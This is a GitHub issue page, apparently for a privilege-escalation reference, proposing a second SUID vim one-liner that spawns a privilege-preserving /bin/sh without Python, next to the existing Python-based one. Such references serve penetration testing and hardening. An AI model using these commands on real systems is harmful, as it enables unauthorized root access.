We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi!
The section about SUID with only mentoins this option:
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
This can be added:
./vim -c ':set shell=/bin/sh\ -p|shell'
benefit is that this doesn't require python support.
The text was updated successfully, but these errors were encountered:
@cyrus-and can you take a look at this? If you need any clarification please tell me!
Sorry, something went wrong.
No branches or pull requests
Hi!
The section about SUID with only mentoins this option:
This can be added:
benefit is that this doesn't require python support.
The text was updated successfully, but these errors were encountered: